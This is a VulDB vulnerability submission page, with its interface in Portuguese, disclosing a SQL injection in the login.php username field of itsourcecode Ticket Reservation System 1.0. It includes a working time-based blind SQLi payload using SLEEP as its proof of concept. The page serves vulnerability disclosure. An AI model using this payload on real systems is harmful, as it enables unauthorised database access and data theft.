Submeter #383643: itsourcecode Ticket Reservation System 1.0 SQLi login.phpinformação

Títuloitsourcecode Ticket Reservation System 1.0 SQLi login.php
DescriçãoIn the login.php page, because the username field is not strictly filtered, it is possible to achieve SQL injection by constructing a specially crafted data packet. --------------POC-------------- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 9494 FROM (SELECT(SLEEP(5)))FbJR) AND 'GlKq'='GlKq&password=123123
Fonte⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-1.md
Utilizador
 Dee.Mirage (UID 71702)
Submissão31/07/2024 07h21 (há 2 anos)
Moderação02/08/2024 23h43 (3 days later)
EstadoAceite
Entrada VulDB273529 [itsourcecode Ticket Reservation System 1.0 Login Page login.php Nome de utilizador Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!